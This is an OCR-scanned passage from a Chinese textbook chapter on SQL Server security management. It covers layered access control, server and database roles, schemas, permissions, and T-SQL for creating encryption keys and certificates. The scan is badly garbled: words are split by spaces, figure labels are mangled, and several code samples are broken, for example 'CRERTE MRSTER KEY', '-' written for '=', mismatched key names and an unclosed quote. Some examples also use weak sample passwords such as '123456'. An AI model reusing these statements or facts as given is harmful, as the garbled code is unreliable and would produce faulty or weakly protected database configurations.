生前 所 有 提交 的 事务 放 到 重 做 队列 ,将 未 提交 的 事务 放 到 撤销 队列 去 执行 ,这 样 就 可 把 数据 
恢复 到 故障 前 某 一 时 间 的 状态 。 

(3) 基于 镜像 数据 库 的 恢复 。 数 据 库 镜 像 就 是 存放 在 另外 一 个 磁盘 上 的 数据 库 副本 ， 
当主 数据 库 更 新 时 候 ,数据 库 管 理 系统 会 自动 把 更 新 的 数据 复制 到 镜像 数据 ,也 就 是 说 镜像 
数据 与 主 数据 始终 保持 一 致 。 所 以 ,当主 库 出 现 故 障 时 ,可 由 镜像 磁盘 继续 提供 服务 ,同时 
用 镜像 磁盘 数据 进行 恢复 。 


14.3 SQL Server 安全 管理 


SQL Server 是 微软 公司 推出 的 一 款 大 型 关系 数据 库 管 理 系 统 ,经 过 多 个 版 本 的 不 断 研 
发 和 改良 , 它 兼 具 了 数据 管理 的 高 效 性 和 使 用 操作 的 易 用 性 ,是 当前 最 流行 的 数据 库 管 理 系 
统 之 一 。 同 时 ,SQL Server 分 层 保护 的 安全 体系 和 内 署 的 多 种 加 密 方法 大 大 提高 了 数据 库 
的 安全 性 ,与 Windows 操作 系统 一 起 构成 了 集成 化 的 安全 环境 。 


14.3.1 SQL Server 安全 控制 体系 


为 了 保证 数据 库 安 全 ,SQL Server 采用 了 一 种 层次 化 的 安全 控制 策略 ,只 有 满足 前 一 
层 系 统 的 安全 性 要 求 ,才能 进入 下 一 层次 ,如 图 14-1 所 示 。 具 体 而 言 ,SQL Server 提供 了 
如 下 所 述 3 层 安 全 保护 。 


EY 
第 1 层 第 2 层 第 3 层 
SQL Server SQL Server SQL Server 
服务 器 级 安全 保 扩 数据 库 级 安全 保护 数据 库 对 象 的 保护 
d 


图 14-1 SQL Server 层次 结构 的 安全 控制 体系 


(1) SQL Server 服务 器 级 安全 保护 。SQL Server 通过 设置 服务 器 登录 名 及 服务 器 角 
色 来 控制 对 数据 库 服务 器 的 连接 ,只 有 成 功 登 录 SQL Server 系统 ,才能 连接 数据 库 。 
(2) SQL Server 数据 库 级 的 安全 保护 。SQL Server 引入 了 用 户 及 角色 两 个 概念 来 方 


便 管理 对 数据 库 的 访问 权限 。 只 有 特定 的 用 户 或 角色 才能 访问 对 应 的 数据 库 , 从 而 防止 了 
非法 用 户 对 数据 资源 的 获取 。 

(3) SQL Server 数据 库 对 象 的 保护 。 在 这 一 层 SQL Server 将 访问 权限 的 控制 粒度 进 
一 步 细 化 ,管理 员 可 以 对 数据 库 对 象 (如 表 、 视 图 .存储 过 程 ) 的 具体 访问 权限 (如 查询 插入、 
删除 等 ) 单 独 设置 ,使 得 即使 是 合法 用 户 ,在 没有 取得 授权 之 前 依然 无 法 访问 对 应 的 数据 库 
对 象 ,从 而 防止 了 合法 用 户 的 越权 访问 。 

SQL Server 的 这 种 安全 控制 策略 层 层 递 进 , 有 效 保护 了 数据 不 受 非法 访问 的 侵害 。 


14.3.2 服务 器 层面 的 安全 保护 


欲 访 问 数据 库 ,必须 先 通过 SQL Server 身份 认证 ,与 服务 器 连接 。SQL Server 采用 两 
种 身份 认证 方式 ,分 别 为 基于 Windows 操作 系统 的 认证 方式 和 混合 认证 方式 ,可 以 在 安装 
SQL Server 时 对 两 种 认证 方式 进行 选择 。 前 者 将 禁用 SQL Server 身份 认证 ,采用 
Windows 的 身份 认证 系统 ; 后 者 则 同时 启用 Windows 身份 认证 及 SQL Server 身份 认证 。 
所 有 的 登录 账号 信息 都 保存 在 系统 数据 库 master 中 。 

当 采 用 Windows 身份 认证 方式 时 ,用 户 身份 由 Windows 操作 系统 进行 确认 ,不 再 要 求 
向 SQL Server 提供 用 户 名 及 密码 。 借 助 于 操作 系统 的 身份 认证 功能 ,这 种 认证 方式 比 
SQL Server 身份 认证 更 安全 ,提供 了 更 多 的 安全 功能 ,包括 安全 确认 、 审 核 、 账 号 锁定 等 , 因 
而 采用 这 种 方式 实现 的 连接 也 被 称 为 可 信和 连接 。 同 时 这 种 方式 无 须 另 设 登录 账号 和 口令 ， 
更 为 便捷 ,是 默认 的 身份 认证 模式 。 

当 采 用 SQL Server 身份 认证 方式 时 , 需 创 建 相 应 的 用 户 名 和 密码 ,并 在 每 次 连接 时 提 
供 。 这 种 认证 方式 的 优点 是 ,其 用 户 可 以 远程 访问 系统 ,或 使 用 应 用 程序 控制 用 户 信息 ,从 
而 便于 维护 使 用 。 

当 在 系统 中 创立 了 对 应 的 身份 认证 账号 后 ,SQL Server 将 自动 产生 相应 的 服务 器 登录 
名 对 象 , 如 图 14-2 所 示 。 其 中 ,sa 用 户 名 即 system administrator, 表 示 系 统管 理 员 。 该 账 
户 拥 有 最 高 的 管理 权限 ,可 以 执行 服务 器 范围 内 的 所 有 操作 。BUILTIN\Administrators 
账户 是 为 Windows 系统 管理 员 管 理 SQL Server 
服务 器 而 提供 的 ,也 可 以 执行 服务 器 范围 内 的 所 
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图 14-3 修改 身份 认证 方式 


一 角色 ,通过 对 角色 进行 权限 设置 就 可 以 实现 对 该 组 所 有 对 象 的 权限 管理 ,从 而 大 大 提高 工 
作 效 率 。 在 服务 器 层面 ,服务 器 登录 名 对 应 的 是 服务 器 角色 。 

在 SQL Server 中 ,服务 器 角色 是 指 根据 系统 管理 任务 及 其 重要 性 把 服务 器 登录 名 对 象 
划分 为 不 同 的 组 ,每 一 组 所 具有 的 访问 权限 都 是 固定 的 ,不 能 对 其 进行 增删 或 修改 。SQL 
Server 提供 的 固定 服务 器 角色 如 表 14-1 所 示 。 除 此 之 外 ,还 有 一 个 特殊 的 服务 器 角色 一 一 
Public, 所 有 服务 器 登录 名 都 是 public 服务 器 角色 的 成 员 , 它 只 拥有 一 个 权限 , 即 浏览 所 有 
数据 库 , 即 view any database。 

表 14-1 SQL Server 中 的 固定 服务 器 角色 


服务 器 角色 名 称 访问 权限 设 定 
可 以 在 数据 库 引 擎 中 执行 任何 活动 。 默 认 情 况 下 , Windows 
系统 管理 员 (sysadmin) BUILTIN\Administrators 组 (本 地 管理 员 组 ) 的 所 有 成 员 都 是 
sysadmin 固定 服务 器 角色 的 成 员 
服务 器 管理 员 (serveradmin) 可 以 更 改 服务 器 范围 的 配置 选项 和 关闭 服务 器 
磁盘 管理 员 (diskadmin) 管理 磁盘 文件 
进程 管理 员 (processadmin) 可 以 终止 在 数据 库 引擎 实例 中 运行 的 进程 


续 表 


服务 器 角色 名 称 访问 权限 设 定 
安全 管理 员 (securityadmin) 可 以 管理 登录 名 及 其 属性 
安装 管理 员 (setupadmin) 可 以 添加 和 删除 链接 服务 器 ,并 可 以 执行 某 些 系统 存储 过 程 
数据 库 创建 者 (dbcreator) 可 以 创建 更改 ,删除 和 还 原 任何 数据 库 
大 容量 插入 操作 管理 者 (bulkadmin) | 可 以 执行 大 容量 插入 操作 


服务 器 登录 名 及 服务 器 角色 从 服务 器 层面 上 实现 了 服务 器 端 对 请 求 数 据 库 资源 的 访问 
权限 控制 ,但 对 于 具体 数据 库 的 访问 控制 而 言 ,服务 器 对 象 的 粒度 过 大 ,需要 进一步 通过 后 
两 级 的 安全 策略 进行 权限 控制 细 化 。 


14.3.3 数据 库 层面 的 安全 保护 


当 用 户 成 功 通过 身份 认证 ,登录 到 SQL Server 服务 器 后 ,并 不 会 拥有 对 所 有 数据 库 的 
访问 权限 ,必须 先 在 欲 访问 的 数据 库 中 建立 一 个 和 登录 账户 相对 应 的 数据 库 用户 ,实际 访问 
时 ,由 SQL Server 系统 根据 该 用 户 的 权限 来 决定 可 和 否 访问 。 通 过 这 样 的 用 户 管理 机 制 ,一 
个 登录 账号 可 以 与 多 个 数据 库 中 的 不 同 用 户 相 对 应 ,一 个 数据 库 也 可 以 拥有 多 个 不 同 权限 
的 访问 用 户 ,实现 了 分 权 管理 。 


1. 数据 库 用 户 


在 SQL Server 2005 中 ,每 个 数据 库 默认 有 两 个 用 户 , 即 Dbo 和 Guest, Dbo 表示 数据 
库 的 拥有 者 ,此 类 用 户 自动 拥有 对 该 数据 库 的 所 有 操作 权限 ; Guest 用 户 则 是 一 个 允许 成 
功 登录 SQL Server 的 所 有 人 访问 数据 库 的 特殊 用 户 ,默认 情况 下 新 数据 库 会 禁用 Guest 用 
户 , 但 可 以 通过 授予 CONNECT 权限 将 其 启用 。 

对 于 一 般 用 户 , 可 以 通过 如 下 方式 进行 创建 。 

[B 14-1】 在 示例 数据 库 AdventureWorks 中 创建 用 户 test; 

(D 打开 SQL Server Management Studio. 从 * 对 象 资 源 管理 器 ”窗口 中 展开 数据 库 
AdventureWorks 的 “安全 性 ”节点 , 如 图 14-4 


所 示 。 s0 S TE 
© 右 击 “ 用 户 ” 节 点 ,在 快捷 菜单 中 选择 “新 建 E pee P 
用 户 ” 命 令 , 打 开 “ 数 据 库 用 户 -新 建 ” 对 话 框 .如 m Ca sexs 
图 14-5 Bron 。 sas 
日 向 视 加 E 
© 在 “用 户 名 ”文本 框 中 输入 创建 的 用 户 名 字 TT 
为 test, Me wasis: 
(D 单 击 “ 登 录 名 ”文本 框 右 侧 的 按钮 ,打开 “ 选 
择 登 录 名 ”对 话 框 如 图 14-6 所 示 。 
© 单 击 “ 浏 览 ” 按 钮 ,打开 “查找 对 象 ” 对 话 框 ， eb 


从 中 选择 创建 用 户 对 应 的 登录 名 对 象 ,如 图 14-7 oenm o 
所 示 。 


图 14-4 “安全 性 ”节点 
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图 14-6 “选择 登录 名 ”对 话 框 


© 单 击 “ 确 定 ” 按 钮 ,返回 图 14-5 所 示 的 新 建 对话 框 ,对 用 户 拥有 的 架构 及 所 属 角色 进 
行 选择 , 单 击 “ 确 定 ” 按 钮 ,完成 新 用 户 的 创建 ,如 图 14-8 所 示 。 

DB] 示例 数据 库 AdventureWorks 的 数据 文件 可 从 微软 官网 上 下 载 ,通过 “附加 数 
据 库 ”的 方法 添加 到 服务 器 上 使 用 。 
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2. 数据 库 角色 
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图 14-8 用 户 test 创建 成 功 


创建 数据 库 用 户 时 需要 设 定 对 应 的 数据 库 角 色 。 所 谓 数据 库 角 色 , 是 为 了 对 数据 库 用 
户 权 限 进行 成 组 设置 而 引入 的 概念 ,属于 某 一 数据 库 角 色 的 所 有 用 户 对 相应 的 数据 库 都 拥 
有 相同 的 访问 权限 。 在 SQL Server 中 ,数据 库 角 色 被 分 为 固定 和 自 定义 两 类 。 

固定 数据 库 角色 由 系统 提供 ,包括 db_owner 等 10 种 不 同类 型 ,如 表 14-2 所 示 。 


表 14-2 固定 数据 库 角 色 


固定 数据 库 角色 名 称 


访问 权限 设 定 


db_accessadmin 
db_backupoperator 
db_datareader 
db_datawriter 


可 以 添加 和 删除 数据 库 的 用 户 ,组 和 角色 

可 以 备份 数据 库 

可 以 对 数据 库 中 的 任何 表 或 视图 运行 SELECT 语句 
可 以 在 所 有 用 户 表 中 添加 、 删 除 或 更 改 数 据 


实践 


Er 
固定 数据 库 角色 名 称 访问 权限 设 定 
db_ddladmin 可 以 在 数据 库 中 运行 任何 数据 定义 语言 (DDL) 命 令 
db_denydatareader 不 能 读 取 数据 库 内 用 户 表 中 的 任何 数据 
db_denydatawriter 不 能 添加 修改 或 删除 数据 库 内 用 户 表 中 的 任何 数据 
db_owner 可 以 执行 数据 库 的 所 有 配置 和 维护 活动 
db_securityadmin 可 以 创建 架构 ,修改 角色 成 员 身 份 和 应 用 程序 角色 
public 具有 全 部 默认 权限 


其 中 ,public 是 一 种 特殊 的 内 置 数据 库 角 色 , 每 个 数据 库 用 户 都 属于 该 数据 库 角 色 , 因 此 
不 能 将 用 户 指派 为 public 角色 成 员 , 也 不 能 删除 public 角色 成 员 。 当 尚未 对 某 个 用 户 授予 或 
拒绝 对 安全 对 象 的 特定 权限 时 , 则 该 用 户 将 继承 授予 该 安全 对 象 的 public 角色 的 权限 。 

在 SQL Server 中 可 以 通过 可 视 化 的 方法 设 定 数据 库 用 户 所 属 的 数据 库 角 色 。 

【 例 14-2】 将 用 户 test 设 定 为 示例 数据 库 AdventureWorks 的 db_owner 角色 成 员 , 除 
了 可 以 在 创建 用 户 时 设 定 外 ,也 可 通过 如 下 步骤 实现 。 

(D 展开 AdventureWorks 数据 库 中 “安全 性 ”节点 下 的 “用 户 ” 节 点 ,找到 test 用 户 ,如 
图 14-8 所 示 。 

© Gli HP 4 test, 在 出 现 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 如 图 14-9 所 示 的 数据 
库 用 户 对 话 框 。 
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图 14-9 数据库 用 户 对 话 框 


O 在 “角色 成 员 ” 列 表 中 找到 db owner 选项 , 勾 选 复 选 框 , 单 击 “确定 ”按钮 完成 
设置 。 

除了 固定 数据 库 角 色 之 外 ,用 户 还 可 以 自 定义 数据 库 角 色 ,实现 个 性 化 的 权限 控制 。 

LB 14-3]. 为 示例 数据 库 AdventureWorks 自 定义 一 个 新 的 数据 库 角 色 manager, iX 
一 角色 下 的 用 户 对 数据 库 表 Employee 具有 执行 SELECT/INSERT 操作 的 权限 ,并 且 将 用 
户 Zhao 和 Qian 添加 到 这 一 角色 中 。 

操作 过 程 如 下 。 

(D 展开 AdventureWorks 数据 库 下 的 “安全 性 ”节点 , 右 击 “角色 ”选项 ,选择 快捷 菜单 
中 的 “新 建 数 据 库 角色 ”命令 ,打开 如 图 14-10 所 示 的 对 话 框 ,在 “角色 名 称 ” 文 本 框 中 输入 角 
色 名 为 “manager”, 在 “此 角色 的 成 员 ” 列 表 框 中 单 击 后 面 的 “添加 ”按钮 将 用 户 “Zhao” 和 
“Qian ”添加 进去 ,如 图 14-10 所 示 。 
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图 14-10 新建 数据 库 角色 


@ 选择 “安全 对 象 ”选项 ,切换 至 角色 权限 配置 对 话 框 ,如 图 14-11 所 示 。 

© 单 击 “ 添 加 ”按钮 ,在 打开 的 对 话 框 中 选择 “搜索 特定 对 象 ”, 对 对 象 类 型 ( 表 ) 及 名 称 
(Employee) 进 行 指 定 , 设 定好 对 应 的 权限 ,如 图 14-12 所 示 。 

D 单 击 “ 确 定 ” 按 钮 ,完成 设置 。 


实践 


图 14-11 添加 控制 的 对 象 
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14-12 ”确定 控制 权限 


3. 数据 库 架 构 


架构 (Schema) 是 一 个 命名 空间 ,是 包含 表 、 视 图 、 存 储 过 程 等 数据 库 对 象 的 容器 。 自 
SQL Server 2005 开始 ,架构 与 用 户 分 离 ,多 个 用 户 可 以 共享 同一 个 默认 架构 ,使 得 开发 人 员 可 
以 将 数据 库 对 象 存储 在 共享 默认 架构 中 ,以 此 实现 对 象 共享 。SQL Server 在 引入 架构 后 ,访问 
数据 库 对 象 的 完全 限定 格式 为 “Server. Database. DatabaseSchema. DatabaseObject”。 

架构 也 是 SQL Server 中 数据 库 级 权限 控制 的 最 小 逮 辑 单位 , 它 既 包括 固定 数据 库 角 色 
对 应 的 数据 库 架 构 ( 如 果 不 需 要 与 固定 数据 库 角 色 具 有 相同 名 称 的 架构 , 则 可 以 删除 它们 )， 
也 包括 用 户 自 定义 的 架构 ; 前 者 主要 涉及 数据 存 取 权限 的 控制 ,如 db_datawriter 即 允 许 对 
数据 库 中 数据 进行 插入 、 删 除 、 修 改 等 操作 ,后 者 则 主要 用 于 控制 数据 可 操作 范围 

通过 下 述 操作 可 以 创建 用 户 自 定义 架构 。 

【 例 14-4] 在 示例 数据 库 pubs 中 创建 架构 Authors, 

D 打开 “对 象 资源 管理 器 "窗口 ,展开 数据 库 pubs 节点 , 右 击 “安全 性 ”节点 下 的 “架构 ” 
项 ,在 快捷 菜单 中 选择 “新 建 架 构 ” 命 令 , 打 开 如 图 14-13 所 示 的 对 话 框 。 

© 切换 到 “常规 ”选项 卡 中 ,输入 架构 名 Authors. “架构 所 有 者 ”名 (可 以 为 用 户 、 角 色 
或 应 用 程序 角色 ) 设 为 test, 如 图 14-13 所 示 。 
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图 14-13 ”新 建 架构 对 话 框 


实践 


C) 切换 至 “权限 ”选项 卡 , 单 击 “ 添 加 ”按钮 ,在 弹出 的 “选择 用 户 和 角色 ”对 话 框 中 选择 
包含 该 架构 的 对 象 ,如 guest, 并 设置 相应 的 访问 权限 ,如 图 14-14 所 示 。 
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务 器 上 使 用 。 

用 户 自 定义 架构 创建 成 功 后 ,就 可 以 实现 基于 架 
构 的 数据 分 离 。 如 在 示例 数据 库 AdventureWorks 中 
有 多 张 用 户 表 , 如 图 14-15 所 示 。 其 中 , 表 名 前 级 表示 
所 属 架 构 , 例 如 HumanResources. Department 表示 该 
KH HumanResources 架构 中 的 对 象 , 表 名 为 
Department。 设 test 为 AdventureWorks 数据 库 中 的 
用 户 , 且 只 拥有 HumanResources 架构 ,如 图 14-16 
所 示 o 

当 以 用 户 test 身份 访问 数据 库 时 , 只 能 看 到 
HumanResources 架构 中 的 表 , 其 余 架 构 中 的 对 象 对 其 
不 可 见 , 如 图 14-17 所 示 。 
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图 14-17 用 户 test 访问 数据 库 时 所 见 


14.3.4 数据 库 对 象 的 安全 保护 


SQL Server 中 用 “权限 ”来 描述 对 各 种 数据 库 对 象 执行 操作 的 规则 ,对 应 的 是 数据 库 对 
象 层面 的 安全 保护 ,是 SQL Server 安全 管理 的 最 后 一 个 级 别 。 在 SQL Server 中 ,权限 被 分 
成 语句 权限 、 对 象 权限 和 隐 含 权限 3 种 。 

语句 权限 是 指 用 户 是 否 有 权 执 行 某 一 语句 ,这 些 语句 通常 涉及 一 些 管理 性 的 操作 ,如 创 
建 数据 库 及 其 他 对 象 的 CREATE TABLE、CREATE VIEW,CREATE RULE ^, 

对 象 权限 决定 用 户 对 如 表 、 视 图 、 存 储 过 程 等 数据 库 对 象 能 执行 哪些 操作 (如 


实践 


UPDATE,DELETE,INSERT,EXECUTE) ,具体 内 容 包 括 如 下 4 个 方面 。 

。 表 (视图 ): 涉及 SELECT INSERT, UPDATE, DELETE 操作 权限 。 

。 自 定义 函数 : 涉及 SELECT 操作 权限 。 

* 表 或 视图 的 某 列 : 涉及 SELECT 和 UPDATE 操作 。 

。 存储 过 程 (函数 ) : 涉及 EXECUTE 操作 。 

隐 含 权限 是 指 无 须 显示 授权 、 自 动 获 得 的 权限 ,主要 包括 固定 服务 器 角色 及 固定 数据 库 
角色 所 赋予 的 操作 权限 。 

权限 的 管理 包括 权限 的 授予、 撤销 及 拒绝 。 

[5] 14-5] 将 Pubs 数据 库 中 的 表 authors 的 SELECT, INSERT 权限 和 存储 过 程 
byroyalty ff] EXECUTE 权限 授予 用 户 test. 

操作 步骤 如 下 。 

D 打开 对 象 资源 管理 器 ,展开 Pubs 数据 库 的 “安全 性 ”节点 , 右 击 用 户 名 test。 

© 在 快捷 菜单 中 选择 “属性 ”命令 ,在 打开 的 对 话 框 中 切换 至 “安全 对 象 " 选 项 界面 ,如 
图 14-18 所 示 。 


图 14-18 “安全 对 象 " 界 面 


© 单 击 “添加 ”按钮 ,打开 如 图 14-19 所 示 的 “添加 对 象 " 对 话 框 ,选择 “特定 对 象 " 单 选 
按钮 , 单 击 “确定 ”按钮 。 

@ 打开 “选择 对 象 " 对 话 框 ,如 图 14-20 所 示 。 单 击 对 象 类 型 "按钮 ,打开 “选择 对 象 类 
型 "对 话 框 ,如 图 14-21 所 示 。 勾 选 “ 存 储 过 程 " 和 “ 表 ” 复 选 框 后 单 击 “确定 ”按钮 。 
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图 14-19 “添加 对 象 "对 话 框 
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图 14-20 “选择 对 象 " 对 话 框 
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图 14-21 “选择 对 象 类 型 "对 话 框 


实践 


C 回 到 * 选 择 对 象 "对 话 框 , 单 击 “浏览 "按钮 ,打开 * 查 找 对 象 " 对 话 框 , 如 图 14-22 所 
示 。 从 中 找到 authors 表 和 存储 过 程 byroyalty, 勾 选 复 选 框 后 单 击 * 确 定 ” 按 钮 。 
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图 14-22 “ERYR NEE 


© 回 到 “数据 库 用 户 -test” 对 话 框 , 先 选 中 数据 库 对 象 ,然后 在 下 方 的 权限 列表 中 色 选 
相应 的 选项 , 单 击 “ 确 定 ” 按 钮 完成 权限 授予 ,如 图 14-23 所 示 。 
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(b) byroyalty 存 储 过 程 权限 授予 设置 


图 14-23 (58) 


GERI 上 述 操作 演示 的 是 如 何在 SQL Server 中 完成 对 数据 库 对 象 权限 的 授予 ,如 果 要 
将 权限 回收 ( 即 撤销 授权 ) ,只 需 重 复 上 述 操 作 第 、@ 步 ,打开 图 14-23 所 示 的 权限 设置 对 话 
框 后 选中 相应 的 数据 库 对 象 , 将 已 色 选 的 权限 取消 ( 即 重复 勾 选 ) ,然后 单 击 “ 确 定 ” 按 钮 即 可 。 

如 果 要 拒绝 某 一 权限 ,操作 方法 同上 ,只 是 在 最 后 一 步 的 权限 设置 对 话 框 中 选择 “ 拒 
绝 ? 列 。 


14.3.5 SQL Server 安全 控制 策略 小 结 


综 上 所 述 ,SQL Server 通过 服务 器 数据库、 数据 库 对 象 3 个 级 别 的 权限 控制 构建 起 一 
个 层次 分 明 的 安全 体系 。 相 关 的 概念 包括 服务 器 登录 名 、 服 务 器 角色 数据 库 用 户 ,数据库 
角色 数据 库 架 构 及 权限 等 ,其 定义 及 内 涵 可 通过 表 14-3 进行 简单 梳理 。 

总 结 起 来 ,要 想 成 功 地 访问 SQL Server 数据 库 中 的 数据 ,首先 必须 具有 合法 的 服务 器 
登录 名 ,从 而 成 功 通过 身份 认证 ,与 数据 库 服务 器 连接 ,而 这 个 服务 器 登录 名 必然 属于 某 一 
服务 器 角色 ,从 而 从 服务 器 层面 上 有 一 定 的 访问 权限 ; 对 于 要 访问 的 具体 数据 库 , 还 需要 为 
该 服务 器 登录 名 建立 相应 的 用 户 ,再 通过 数据 库 角色 及 数据 库 架 构 的 指定 使 其 具有 访问 该 
数据 库 的 某 些 权 限 ; 对 于 特定 的 数据 库 对 象 , 还 可 以 将 权限 控制 粒度 进一步 细 化 ,具体 说 明 
用 户 对 该 对 象 所 允许 的 操作 ,它们 之 间 的 关系 如 图 14-24 所 示 。 


实践 


表 14-3 SQL Server 安全 机 制 相关 概念 


SQL Server 安全 机 制 组 成 简短 定义 

服务 器 登录 名 连接 SQL Server 服务 器 时 所 需 的 用 户 名 ,表示 某 一 服务 器 用 户 

服务 器 角色 一 组 固定 的 服务 器 用 户 , 从 服务 器 层面 上 规定 了 一 系列 的 访问 权限 

数据 库 用 户 对 某 一 数据 库 具 有 某 种 操作 权限 的 合法 用 户 

数据 库 角色 一 组 固定 的 数据 库 用 户 , 从 数据 库 层面 上 规定 了 一 系列 的 访问 权限 ,分 为 固 
定 和 用 户 自 定义 两 类 

数据 库 架 构 包含 数据 库 对 象 的 命名 空间 ,分 为 固定 和 用 户 自 定义 两 类 ,进一步 细 化 数据 
库 用 户 可 访问 的 数据 库 对 象 

权限 说 明 用 户 对 数据 库 对 象 可 执行 哪些 操作 的 规则 ,分 为 语句 权限 、 对 象 权限 和 
隐 含 权限 3 种 


图 14-24 SQL Server 安全 机 制 中 各 概念 关系 


14.3.6 SQL Server 中 的 数据 加 密 


数据 库 中 的 数据 大 多 是 以 明文 的 方式 存储 ,对 于 类 似 个 人 信息 .商业 机 密 这 样 的 敏感 数 
据 ,这 样 的 存储 方式 显然 会 有 巨大 隐患 ,数据 库 加 密 技术 就 成 了 解决 这 个 问题 的 明智 选择 。 
针对 这 一 问题 ,SQL Server 提供 了 完善 的 加 密 算法 和 用 户 的 密 钥 管理 机 制 ,进一步 增强 了 
数据 库 安全 性 。 

SQL Server 自 2005 版 本 开始 ,整合 了 多 层次 的 数据 加 密 算 法 和 密 钥 管理 作为 其 内 部 
特性 ,能 根据 用 户 需求 选用 不 同 的 粒度 对 数据 进行 加 密 , 其 加 密 体系 结构 如 图 14-25 所 示 ， 
箭头 方向 表示 前 者 ( 始 端 ) 可 加 密 后 者 (终端 ) 。 
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图 14-25 SQL Server 加 密 体系 结构 


SQL Server 的 加 密 体系 采用 了 分 层 架 构 , 当 对 数据 加 密 时 ,首先 需要 创建 服务 主 密 钥 ， 
该 密 钥 以 三 层 DES 密 钥 实 现 ,在 安装 SQL Server 数据 库 实 例 时 自动 生成 ,并 由 Windows 
的 DPAPI 来 保证 其 安全 ,是 整个 实例 的 根 密 钥 ; 然后 需要 创建 数据 库 主 密 钥 , 此 密 钥 必须 
由 属于 sysadmin 服务 器 角色 的 账号 创建 ,每 个 数据 库 只 需 创建 一 次 主 密 钥 。SQL Server 
有 3 种 方法 可 以 对 数据 进行 加 密 , 分 别 为 采用 对 称 密 钥 加 密 、 采 用 非 对 称 密 钥 加 密 和 采用 证 
书 加 密 。 对 称 加 密 法 加 解密 速度 快 ,适合 于 处 理 大 量 数据 ,但 缺点 是 加 密 密 钥 和 解密 密 钥 相 
同 ,因而 密 钥 本 身 的 保管 是 一 个 问题 ,需要 对 密 钥 进行 二 次 加 密 。 非 对 称 加 密 法 基于 数学 上 
的 一 些 NP 问题 提出 ,算法 相对 复杂 , 密 钥 由 公 钥 和 私 钥 组 成 , 当 用 于 数据 加 密 时 , 公 钥 公 
开 , 用 于 加 密 ; 私 钥 则 不 公开 ,用 于 解密 。 这 种 方法 相对 于 对 称 加 密 法 的 优点 是 安全 性 更 
好 , 密 钥 管理 简单 ,但 由 于 算法 复杂 而 带 来 加 解密 速度 的 减 慢 ,不 适宜 处 理 大 量 数据 。 兼 具 
二 者 优点 的 解决 方案 是 采用 对 称 加 密 法 来 处 理 大 量 数据 , 非 对称 加 密 法 处 理 对 称 密 钥 。 除 
此 之 外 ,证 书 是 基于 非 对 称 加 密 法 的 演变 形式 , 它 是 数字 签名 的 声明 ,将 公 钥 的 值 关联 到 持 
有 对 应 私 钥 的 个 人 或 系统 的 标识 。 


1. 各 级 密 钥 的 创建 


SQL Server 中 , 除 服务 主 密 钥 是 在 安装 时 自动 生成 外 ,其 余 密 钥 都 需要 手工 创建 。 
CD 数据 库 主 密 钥 的 创建 。 通 过 以 下 T-SQL 语句 可 以 创建 数据 库 主 密 钥 。 


CRERTE MRSTER KEY 
ENCRYPTION BY PASSWORD = '< password>'; 
/ * password 是 创建 时 对 主 密 钥 副本 进行 加 密 的 密码 * / 


【 例 14-6】 为 SQL Server 实例 数据 库 AdventureWorks 创建 数据 库 主 密 钥 ,加 密 密 码 
是 DBSecurity2013 ,代码 如 下 。 


CREATE MASTER KEY 
ENCRYPTION BY PASSWORD - 'DBSecurity2013'; 


(2) 对 称 密 钥 的 创建 。 使 用 CREATE SYMMETRIC KEY 命令 可 创建 对 称 密 钥 ,其 语 
句 格式 如 下 。 


CREATE SYMMETRIC KEY < key name? 一 一 key name 为 创建 的 对 称 密 钥 名 
WITH ALGORITHM = < key option?[, -- n] 

—- key option 表示 选择 的 加 密 算 法 ,可 选用 RC2 ,RCA DES 和 AES 等 加 密 算 法 

ENCRYPTION BY < encrypting mechanism>[, -- n] 

/ * encrypting mechanism: 指定 加 密 机 制 ,可 以 采用 密码 保护 ,也 可 以 是 其 他 对 称 密 钥 、 非 对 称 密 钥 
或 证 书 * / 


【 例 14-7] 为 SQL Server 实例 数据 库 AdventureWorks 创建 对 称 密 钥 SymDemoKey， 
采用 DES 加 密 算 法 , 密 钥 采用 密码 保护 ,密码 为 DBSecurity2013, 代 码 如 下 。 


USE AdventureWorks 

Go 

CREATE SYMMETRIC KEY SynDemoKey 

WITH ALGORITHM - DES 

ENCRYPTION BY PASSWORD = 'DBSecurity2013'; 


实践 


对 称 密 钥 创 建 好 后 ,使 用 时 需 先 用 OPEN SYMMETRIC KEY 命令 将 其 打开 ,格式 
如 下 。 


OPEN SYMMETRIC KEY < key name? 
DECRYPTION BY < encrypting mechanism>[, --- n] 


参数 含义 与 创建 时 类 似 , 不 再 次 述 。 

[8] 14-8】 打开 例 14-7 中 创建 的 对 称 密 钥 SymDemoKey, 语 句 如 下 。 
OPEN SYMMETRIC KEY SymDemoKey 

DECRYPTION BY PASSWORD = 'DBSecurity2013" 


在 使 用 完毕 后 ,需要 执行 CLOSE SYMMETRIC KEY 命令 来 关闭 对 称 密 钥 , 命 令 格式 
如 下 。 


CLOSE SYMMETRIC KEY key name | ALL SYMMETRIC KEY 


参数 key. name 表示 待 关闭 的 对 称 密 钥 的 名 称 , 如 果 选 择 关键 字 ALL SYMMETRIC 
KEY, 则 关闭 所 有 已 打开 的 对 称 密 钥 , 同 时 也 显 式 地 关闭 数据 库 主 密 钥 。 

(3) 非 对 称 密 钥 的 创建 。 非 对 称 密 钥 的 创建 方法 与 对 称 密 钥 基本 相同 ,只 是 把 命令 中 
的 关键 字 SYMMETRIC 换 成 ASYMMETRIC, SQL Server 支持 基于 RSA 算法 的 非 对 称 
加 密 , 其 加 密 强 度 可 以 为 512 位 、1024 位 或 2048 位 。 

【 例 14-9] 为 SQL Server 实例 数据 库 AdventureWorks &] # 3E XJ fk 9 4] 
ASymDemoKey, 采 用 强度 1024 位 的 RSA 算法 ,采用 密码 进行 加 密 , 密 码 为 "123456”, 代 码 
如 下 。 


USE AdventureWorks 

Go 

CREATE ASYMMETRIC KEY ASymDemoKey 
WITH ALGORITHM = RSA_1024 
ENCRYPTION BY PASSWORD = '123456'; 


非 对 称 密 钥 创 建 后 ,使 用 时 无 须 打 开 。 
(4) 证 书 的 创建 。 创 建 证 书 的 T-SQL 语句 格式 简单 说 明 如 下 。 


CREATE CERTIFICATE certificate name 一 说 明 创建 证 书 的 名 字 
{ FROM < existing keys> | «generate new keys? } 
/ * 可 以 根据 已 有 密 钥 (existing keys) 创 建 证 书 ,也 可 以 新 建 */ 
<generate new keys? i: = 
[ ENCRYPTION BY PASSWORD = 'password'] 
/ * 指定 对 私 钥 的 密码 保护 ,如 默认 , 则 为 空 密码 * / 
WITH SUBJECT = 'certificate_subject_name' 
/* 对 证 书 内 容 、 用 途 等 进行 说 明 , 是 证 书 元 数据 中 的 字段 * / 
[ , «date options» [ ,...n ] ] 
«date options? :: = 
START DATE - 'datetime'| EXPIRY DATE - 'datetime' 
